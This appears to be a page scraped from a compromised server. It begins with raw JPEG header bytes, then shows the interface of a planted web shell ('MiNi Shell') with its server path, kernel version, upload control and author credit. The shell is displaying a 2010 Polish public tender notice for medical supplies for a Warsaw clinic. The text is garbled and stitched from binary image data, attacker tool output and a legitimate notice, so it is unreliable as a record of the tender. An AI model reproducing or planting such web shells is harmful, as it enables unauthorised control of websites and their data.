JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100122/19306-N-2010.html

<p class="kh_header"><b>Warszawa: Dostawa drobnego i jednorazowego sprzętu medycznego do Przychodni Lekarskiej WAT SP ZOZ w okresie 3 lat</b><br>
<b>Numer ogłoszenia: 19306 - 2010; data zamieszczenia: 22.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przychodnia Lekarska Wojskowej Akademii Technicznej Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Kartezjusza 2, 01-480 Warszawa, woj. mazowieckie, tel. 022 6838281, 6838283, faks 022 6838224.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.plwat.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa drobnego i jednorazowego sprzętu medycznego do Przychodni Lekarskiej WAT SP ZOZ w okresie 3 lat.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zamówienie obejmuje: 
Pakiet 1: Drobny i jednorazowy sprzęt medyczny;
Pakiet 2: Nici chirurgiczne
2.Szczegółowy opis przedmiotu zamówienia, z podziałem na 2 pakiety (w 2 tabelach); zawierający informacje o asortymencie, jedn. miary, szacunkowej ilości zamawianych pozycji, wraz z rubrykami do wypełnienia przez Wykonawców został określony w  formularzu asortymentowo-cenowym, stanowiącym Zał. Nr 1 do SIWZ, i który po uzupełnieniu należy dołączyć do oferty.
3. Ofertę - Zał. Nr 2 do SIWZ będzie można złożyć na całość przedmiotu zamówienia lub na każdy z pakietów oddzielnie. Pakiety dalej nie są już podzielne i Wykonawca, składając ofertę, zobowiązuje się do dostawy wszystkich pozycji asortymentowych, wymienionych w wybranym lub wybranych pakietach.
4.Dostawy przedmiotu zamówienia wymienionego w załączniku Nr 1 (Pakiet I) będą realizowane na koszt i ryzyko Wykonawców, sukcesywnie, zgodnie z aktualnymi potrzebami, zgłaszanymi telefonicznie lub faksem, jako zamówienia częściowe, z częstotliwością  przeważnie 2 razy w tygodniu w godz. 8 - 14 w dni robocze, w terminie do 2 dni, od dnia złożenia zamówienia.
5.W przypadku spadku notowanych na rynku cen zamawianych przedmiotów umowy, Wykonawca zobowiązuje się do obniżenia cen Zamawiającemu.
6.Zamawiający zastrzega, że wzrost cen nie może nastąpić przed upływem 12 miesięcy od momentu obowiązywania umowy. 
7.Po upływie 12 miesięcy obowiązywania umowy Zamawiający dopuszcza wzrost cen zamawianego asortymentu z przyczyn niezależnych od Wykonawcy w następujących przypadkach:
a) drastyczny wzrost cen producentów lub kosztów transportu (powyżej 10%), 
b) zmiana stawek podatku VAT,
c) zmiana kursu walut (w przypadku asortymentu importowanego),
d)zmiana stawek celnych, (powyżej 10% w przypadku asortymentu importowanego),
e) poziom inflacji wg opublikowanego komunikatu Prezesa GUS -  w sprawie średniorocznego wskaźnika wzrostu cen towarów i usług za okres poprzednich 12 miesięcy;
f)wzrost płacy minimalnej (powyżej 10%) wg obwieszczenia prezesa Rady Ministrów, opublikowanego w Monitorze Polskim.
8.Kolejny wzrost cen możliwy jest po upływie 12 miesięcy od daty poprzedniego wniosku o podniesienie cen. 
9.Wykonawca będzie uwzględniał na swój koszt reklamacje ilościowe i jakościowe najszybciej jak to możliwe, nie dłużej jednak niż 2 dni.
10. Płatność przez Zamawiającego na rzecz Wykonawcy będzie realizowana, po każdej częściowej dostawie, w terminie do 30 dni od dnia dostarczenia faktury.
Załacznikiem do SIWZ jest projekt umowy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.12.00-2, 33.14.12.20-8, 33.14.13.10-6, 33.14.13.20-9, 33.14.14.00-4, 33.16.94.00-6, 33.14.11.21-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.   Zgodnie z art. 22 ust. 1 ustawy Pzp o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące:
1)   posiadania uprawnień do wykonywania określonej działalności lub czynności,
      jeżeli przepisy prawa nakładają obowiązek ich posiadania;
2)   posiadania wiedzy i doświadczenia;
3)  dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
4)   sytuacji ekonomicznej i finansowej, 
2. Ocena spełniania warunków udziału Wykonawców w niniejszym postępowaniu będzie przeprowadzona metodą spełnia - nie spełnia, na podstawie załączonych i wymaganych oświadczeń i dokumentów, których lista znajduje poniżej i została opracowana na podstawie Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U.2009 r., Nr 226, poz. 1817):.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu wykazania spełniania przez Wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy Pzp, Zamawiający wymaga następujących dokumentów:
3.1   Wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych dostaw według wzoru Zał. Nr 5 w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy zostały wykonane lub są wykonywane należycie; Zamawiający wymaga wykazu min. 3 odbiorców dostaw z załączonymi referencjami.
3.2Opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, o wartości nie mniejszej niż 150 000 PLN;
4. Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy Pzp, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający będzie wymagał od Wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w pkt. 5.
5.W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy, Zamawiający wymaga następujących dokumentów:
5.1   Oświadczenia o braku podstaw do wykluczenia na podstawie art. 24 ust. 1    ustawy Pzp, złożonym według wzoru Zał. Nr 3;
5.2   Aktualnego odpisu z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt. 2 ustawy Pzp;
6.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt. 5.2 - składa dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono         upadłości. Dokument powyższy powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
7.Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa w pkt. 5.2, zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sadowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
8.W przypadku wątpliwości co do treści dokumentu złożonego przez Wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, Zamawiający może zwrócić się do właściwych organów odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę  lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu.
9.W celu potwierdzenia, że oferowane dostawy, odpowiadają wymaganiom określonym przez Zamawiającego, Zamawiający wymaga złożenia oświadczenia według wzoru Zał. Nr 4, że będący przedmiotem umowy drobny i jednorazowy sprzęt medyczny wymieniony w Zał. Nr 1, w zakresie pozycji asortymentowych, których to dotyczy, spełnia wymagania Ustawy z dnia 20 kwietnia 2004 r. o wyrobach medycznych (Dz. U. 2004 r., Nr 93, poz. 896 z późn. zm.), posiada oznakowania CE i na każde wezwanie Zamawiającego, zostaną dostarczone odpowiednie dokumenty z Rejestru Wyrobów Medycznych.
10.Dokumenty są składane w oryginale lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. 
11.Wykonawcy, którzy wspólnie ubiegają się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
12.Jeżeli zostanie wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający będzie wymagał przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę wykonawców.
13. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów, o których mowa w ust. 4, kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem przez Wykonawcę lub te podmioty.
14.Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski. 
15.Złożone na wezwanie Zamawiającego oświadczenia i dokumenty (o ile to dotyczy) powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane dostawy wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert.
16. Zamawiający wzywa także, w wyznaczonym przez siebie terminie, do złożenia wyjaśnień dotyczących wymaganych oświadczeń lub dokumentów.
17.Z ubiegania się o udzielenie zamówienia publicznego wyklucza się Wykonawców, którzy nie spełniają warunków udziału w postępowaniu o zamówienie publiczne, o których mowa w art. 24 ust. 1 i 2 ustawy Pzp..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.plwat.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przychodnia Lekarska WAT Samodzielny Publiczny ZOZ
Warszawa, 01-480 ul. Kartezjusza 2
w Sekcji Zamówień Publicznych, pok. 411 w godzinach 8-14.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.02.2010 godzina 09:00, miejsce: Przychodnia Lekarska WAT Samodzielny Publiczny ZOZ
Warszawa, ul. Kartezjusza 2
w Kancelarii pok. 109 lub w Sekcji zamówień Publicznych pok. 411.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet 1
Dostawa drobnego i jednorazowego sprzętu medycznego.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiane artykuły w 73 rodzajach z Pakietu 1 zostały podane w arkuszu asortmentowo-cenowym w  Załącznik Nr 1  Pakiet 1 tabela 1 do SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-0, 33.14.12.00-2, 33.14.12.20-8, 33.14.13.10-6, 33.14.13.20-9, 33.14.14.04-4, 33.16.94.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet 2
Dostawa nici chirurgicznych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający wykaz 5 rodzajów zamawianych nici chirurgicznych podał w Zał. Nr 1, Pakiet 2, tabela 2.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com